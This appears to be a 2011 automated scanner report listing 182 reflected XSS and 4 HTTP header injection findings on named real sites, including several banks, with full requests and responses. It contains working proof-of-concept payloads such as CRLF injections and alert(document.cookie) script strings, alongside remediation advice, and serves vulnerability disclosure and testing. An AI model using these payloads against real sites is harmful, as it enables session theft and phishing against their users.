XSS, HTTP Header Injection, CWE-113, CWE-79, CAPEC-86

XSS in Various Hosts | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:43:41 CST 2011.



DORK CWE-79 XSS Report

Loading

1. HTTP header injection

1.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

1.2. http://locators.bankofamerica.com/locator/locator/LocatorAction.do [REST URL parameter 3]

1.3. http://www.fis.com/fis/worldnews/worldnews.asp [REST URL parameter 1]

1.4. http://www.fis.com/fis/worldnews/worldnews.asp [REST URL parameter 2]

2. Cross-site scripting (reflected)

2.1. http://ad.thehill.com/www/delivery/al.php [shifth parameter]

2.2. http://ad.thehill.com/www/delivery/al.php [shiftv parameter]

2.3. http://api.facebook.com/restserver.php [method parameter]

2.4. http://api.facebook.com/restserver.php [urls parameter]

2.5. http://api.viglink.com/api/click [format parameter]

2.6. http://api.viglink.com/api/click [jsonp parameter]

2.7. http://api.viglink.com/api/click [out parameter]

2.8. http://api.viglink.com/api/click [out parameter]

2.9. http://api.viglink.com/api/ping [key parameter]

2.10. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 4]

2.11. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [name of an arbitrarily supplied request parameter]

2.12. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [nsextt parameter]

2.13. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [nsextt parameter]

2.14. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 4]

2.15. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 5]

2.16. http://citi.bridgetrack.com/a/s/ [BT_PID parameter]

2.17. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]

2.18. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]

2.19. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]

2.20. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment [REST URL parameter 4]

2.21. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment [REST URL parameter 4]

2.22. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]

2.23. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]

2.24. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment [REST URL parameter 4]

2.25. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment [REST URL parameter 4]

2.26. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]

2.27. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]

2.28. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment [REST URL parameter 4]

2.29. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment [REST URL parameter 4]

2.30. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]

2.31. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]

2.32. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment [REST URL parameter 4]

2.33. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment [REST URL parameter 4]

2.34. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]

2.35. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]

2.36. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment [REST URL parameter 4]

2.37. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment [REST URL parameter 4]

2.38. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ [name of an arbitrarily supplied request parameter]

2.39. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/ [name of an arbitrarily supplied request parameter]

2.40. http://community.invisionpower.com/files/file/3937-peace/ [name of an arbitrarily supplied request parameter]

2.41. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ [name of an arbitrarily supplied request parameter]

2.42. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/ [name of an arbitrarily supplied request parameter]

2.43. http://community.invisionpower.com/files/file/3940-dp31-ihost/ [name of an arbitrarily supplied request parameter]

2.44. http://community.invisionpower.com/files/file/3941-vanilla-valentine/ [name of an arbitrarily supplied request parameter]

2.45. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/ [name of an arbitrarily supplied request parameter]

2.46. http://community.invisionpower.com/files/file/3943-speed/ [name of an arbitrarily supplied request parameter]

2.47. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/ [name of an arbitrarily supplied request parameter]

2.48. http://community.invisionpower.com/resources/documentation/index.html [name of an arbitrarily supplied request parameter]

2.49. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17 [name of an arbitrarily supplied request parameter]

2.50. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 [name of an arbitrarily supplied request parameter]

2.51. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 [name of an arbitrarily supplied request parameter]

2.52. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 [name of an arbitrarily supplied request parameter]

2.53. http://community.invisionpower.com/resources/official.html [name of an arbitrarily supplied request parameter]

2.54. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/ [REST URL parameter 2]

2.55. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/ [REST URL parameter 3]

2.56. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi [name of an arbitrarily supplied request parameter]

2.57. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]

2.58. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]

2.59. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]

2.60. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]

2.61. http://search.wareseeker.com/ip-board/ [REST URL parameter 1]

2.62. http://search.wareseeker.com/ip-board/ [name of an arbitrarily supplied request parameter]

2.63. http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js [REST URL parameter 2]

2.64. http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js [REST URL parameter 3]

2.65. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 3]

2.66. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 4]

2.67. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 4]

2.68. http://weather.weatherbug.com/desktop-weather/web-widgets/getSticker.html [ZCode parameter]

2.69. http://weather.weatherbug.com/desktop-weather/web-widgets/getSticker.html [ZCode parameter]

2.70. http://www.arbornetworks.com/index.php [Itemid parameter]

2.71. http://www.arbornetworks.com/index.php [id parameter]

2.72. http://www.arbornetworks.com/index.php [name of an arbitrarily supplied request parameter]

2.73. http://www.bankofamerica.com/creditcards/index.cfm [REST URL parameter 1]

2.74. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 1]

2.75. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 2]

2.76. http://www.bankofamerica.com/financialtools/index.cfm [REST URL parameter 1]

2.77. http://www.bankofamerica.com/findit/locator.cfm [REST URL parameter 1]

2.78. http://www.bankofamerica.com/help/equalhousing.cfm [REST URL parameter 1]

2.79. http://www.bankofamerica.com/help/equalhousing_popup.cfm [REST URL parameter 1]

2.80. http://www.bankofamerica.com/help/index.cfm [REST URL parameter 1]

2.81. http://www.bankofamerica.com/loansandhomes/index.cfm [REST URL parameter 1]

2.82. http://www.bankofamerica.com/onlinebanking/index.cfm [REST URL parameter 1]

2.83. http://www.bankofamerica.com/pap/index.cfm [REST URL parameter 1]

2.84. http://www.bankofamerica.com/studentbanking/index.cfm [REST URL parameter 1]

2.85. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [REST URL parameter 1]

2.86. http://www.branchmap.com/mapserver.php [city parameter]

2.87. http://www.branchmap.com/mapserver.php [dist parameter]

2.88. http://www.branchmap.com/mapserver.php [zip parameter]

2.89. http://www.branchmap.com/mapserver.php [zoom parameter]

2.90. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [REST URL parameter 2]

2.91. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]

2.92. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]

2.93. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]

2.94. http://www.chasemilitary.com/ [name of an arbitrarily supplied request parameter]

2.95. http://www.chasemilitary.com/Default.aspx [ada parameter]

2.96. http://www.chasemilitary.com/Default.aspx [name of an arbitrarily supplied request parameter]

2.97. http://www.google.com/advanced_search [hl parameter]

2.98. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

2.99. http://www.google.com/advanced_search [prmd parameter]

2.100. http://www.google.com/advanced_search [q parameter]

2.101. http://www.google.com/images [q parameter]

2.102. http://www.invisionpower.com/products/board/features/ [name of an arbitrarily supplied request parameter]

2.103. http://www.invisionpower.com/products/nexus/features/store.php [name of an arbitrarily supplied request parameter]

2.104. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx [name of an arbitrarily supplied request parameter]

2.105. http://www.learningsolutions.com.hk/index.php [Itemid parameter]

2.106. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html [name of an arbitrarily supplied request parameter]

2.107. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [name of an arbitrarily supplied request parameter]

2.108. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [src_cd parameter]

2.109. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [name of an arbitrarily supplied request parameter]

2.110. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [src_cd parameter]

2.111. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]

2.112. http://www.retirement.merrilledge.com/IRA/ScriptResource.axd [d parameter]

2.113. http://www.retirement.merrilledge.com/IRA/WebResource.axd [d parameter]

2.114. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [name of an arbitrarily supplied request parameter]

2.115. https://www2.bankofamerica.com/promos/jump/greatdeals/ [name of an arbitrarily supplied request parameter]

2.116. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [Referer HTTP header]

2.117. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

2.118. http://www.bankofamerica.com/help/equalhousing_popup.cfm [Referer HTTP header]

2.119. http://www.jpmorgan.com/pages/jpmorgan [User-Agent HTTP header]

2.120. http://www.arbornetworks.com/ [mbfcookie[lang] cookie]

2.121. http://www.arbornetworks.com/cleanpipes [mbfcookie[lang] cookie]

2.122. http://www.arbornetworks.com/cn/865.html [mbfcookie[lang] cookie]

2.123. http://www.arbornetworks.com/cn/infrastructure-security-report.html [mbfcookie[lang] cookie]

2.124. http://www.arbornetworks.com/contact [mbfcookie[lang] cookie]

2.125. http://www.arbornetworks.com/de/5.html [mbfcookie[lang] cookie]

2.126. http://www.arbornetworks.com/de/infrastructure-security-report.html [mbfcookie[lang] cookie]

2.127. http://www.arbornetworks.com/deeppacketinspection [mbfcookie[lang] cookie]

2.128. http://www.arbornetworks.com/en/9.html [mbfcookie[lang] cookie]

2.129. http://www.arbornetworks.com/en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html [mbfcookie[lang] cookie]

2.130. http://www.arbornetworks.com/en/arbor-in-action-global-network-security-solution-resources.html [mbfcookie[lang] cookie]

2.131. http://www.arbornetworks.com/en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html [mbfcookie[lang] cookie]

2.132. http://www.arbornetworks.com/en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html [mbfcookie[lang] cookie]

2.133. http://www.arbornetworks.com/en/asert-arbor-security-engineering-response-team-2.html [mbfcookie[lang] cookie]

2.134. http://www.arbornetworks.com/en/atlas-global-network-threat-analysis-460.html [mbfcookie[lang] cookie]

2.135. http://www.arbornetworks.com/en/channel-partners-3.html [mbfcookie[lang] cookie]

2.136. http://www.arbornetworks.com/en/com-5fcontent/view-2.html [mbfcookie[lang] cookie]

2.137. http://www.arbornetworks.com/en/com-5fcontent/view-3.html [mbfcookie[lang] cookie]

2.138. http://www.arbornetworks.com/en/contact-us-4.html [mbfcookie[lang] cookie]

2.139. http://www.arbornetworks.com/en/contact-us.html [mbfcookie[lang] cookie]

2.140. http://www.arbornetworks.com/en/customer-solution-briefs.html [mbfcookie[lang] cookie]

2.141. http://www.arbornetworks.com/en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html [mbfcookie[lang] cookie]

2.142. http://www.arbornetworks.com/en/ipv6-report.html [mbfcookie[lang] cookie]

2.143. http://www.arbornetworks.com/en/meet-our-partners.html [mbfcookie[lang] cookie]

2.144. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html [mbfcookie[lang] cookie]

2.145. http://www.arbornetworks.com/en/network-security-experts-2.html [mbfcookie[lang] cookie]

2.146. http://www.arbornetworks.com/en/network-security-monitoring-solutions-for-your-industry.html [mbfcookie[lang] cookie]

2.147. http://www.arbornetworks.com/en/network-security-research-2.html [mbfcookie[lang] cookie]

2.148. http://www.arbornetworks.com/en/network-security-visibility-products-235.html [mbfcookie[lang] cookie]

2.149. http://www.arbornetworks.com/en/network-solutions-we-provide.html [mbfcookie[lang] cookie]

2.150. http://www.arbornetworks.com/en/news-events.html [mbfcookie[lang] cookie]

2.151. http://www.arbornetworks.com/en/partnership-inquiry-form.html [mbfcookie[lang] cookie]

2.152. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html [mbfcookie[lang] cookie]

2.153. http://www.arbornetworks.com/en/solution-partners-4.html [mbfcookie[lang] cookie]

2.154. http://www.arbornetworks.com/en/solutions-for-places-in-your-network.html [mbfcookie[lang] cookie]

2.155. http://www.arbornetworks.com/en/solutions-for-your-business-needs.html [mbfcookie[lang] cookie]

2.156. http://www.arbornetworks.com/en/technology-partners-4.html [mbfcookie[lang] cookie]

2.157. http://www.arbornetworks.com/en/what-we-do-network-security-solutions-services.html [mbfcookie[lang] cookie]

2.158. http://www.arbornetworks.com/en/white-papers-global-network-security-topics-2.html [mbfcookie[lang] cookie]

2.159. http://www.arbornetworks.com/es/5.html [mbfcookie[lang] cookie]

2.160. http://www.arbornetworks.com/es/infrastructure-security-report.html [mbfcookie[lang] cookie]

2.161. http://www.arbornetworks.com/fr/4.html [mbfcookie[lang] cookie]

2.162. http://www.arbornetworks.com/fr/infrastructure-security-report.html [mbfcookie[lang] cookie]

2.163. http://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]

2.164. http://www.arbornetworks.com/it [mbfcookie[lang] cookie]

2.165. http://www.arbornetworks.com/it/infrastructure-security-report.html [mbfcookie[lang] cookie]

2.166. http://www.arbornetworks.com/jp/2.html [mbfcookie[lang] cookie]

2.167. http://www.arbornetworks.com/jp/infrastructure-security-report.html [mbfcookie[lang] cookie]

2.168. http://www.arbornetworks.com/kr/2.html [mbfcookie[lang] cookie]

2.169. http://www.arbornetworks.com/kr/network-infrastructure-security-report.html [mbfcookie[lang] cookie]

2.170. http://www.arbornetworks.com/privacy_policy.php [mbfcookie[lang] cookie]

2.171. https://www.arbornetworks.com/ [mbfcookie[lang] cookie]

2.172. https://www.arbornetworks.com/en/lost-password-3.html [mbfcookie[lang] cookie]

2.173. https://www.arbornetworks.com/en/partner-portal-home.html [mbfcookie[lang] cookie]

2.174. https://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]

2.175. https://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]

2.176. https://www.arbornetworks.com/register.html [mbfcookie[lang] cookie]

2.177. https://www.bankofamerica.com/privacy/Control.do [BOA_0020 cookie]

2.178. https://www.bankofamerica.com/privacy/index.jsp [BOA_0020 cookie]

2.179. https://www.bankofamerica.com/smallbusiness/index.jsp [BOA_0020 cookie]

2.180. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [name of an arbitrarily supplied request parameter]

2.181. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [src_cd parameter]

2.182. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [pxs cookie]



1. HTTP header injection  next
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload e98b7%0d%0a72138907069 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0e98b7%0d%0a72138907069; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0e98b7
72138907069
; expires=Tue, 03-May-2011 20: 57:40 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001gYx+adwF0cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; expires=Tue, 03-May-2011 20:57:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; expires=Tue, 03-May-2011 20:57:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Tue, 03-May-2011 20:57:40 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 01:57:39 GMT
Connection: close
Content-Length: 1696

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

1.2. http://locators.bankofamerica.com/locator/locator/LocatorAction.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/LocatorAction.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 44609%0d%0a823a43cd739 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/44609%0d%0a823a43cd739 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:10:48 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26
Set-Cookie: JSESSIONID=6B551B6EF292368753CEA0B23B3B8F3A.ftb-web4; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/44609
823a43cd739
?shouldTest=true
Content-Language: en-US
Content-Length: 0
Connection: close
Content-Type: text/plain


1.3. http://www.fis.com/fis/worldnews/worldnews.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49dfd%0d%0ab7061f6f456 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49dfd%0d%0ab7061f6f456/worldnews/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 01:52:12 GMT
Connection: close
Location: /fis/error/error.asp?404;http://www.fis.com/49dfd
b7061f6f456
/worldnews/worldnews.asp


1.4. http://www.fis.com/fis/worldnews/worldnews.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d412c%0d%0ad95cbc5e854 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /fis/d412c%0d%0ad95cbc5e854/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 01:52:17 GMT
Connection: close
Location: /fis/error/error.asp?404;http://www.fis.com/fis/d412c
d95cbc5e854
/worldnews.asp


2. Cross-site scripting (reflected)  previous
There are 182 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.thehill.com/www/delivery/al.php [shifth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.thehill.com
Path:   /www/delivery/al.php

Issue detail

The value of the shifth request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 66993%3balert(1)//766c94fef6e was submitted in the shifth parameter. This input was echoed as 66993;alert(1)//766c94fef6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=066993%3balert(1)//766c94fef6e&shiftv=0&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1
Host: ad.thehill.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:32:17 GMT
Content-type: application/x-javascript
P3P: CP="CUR ADM OUR NOR STA NID"
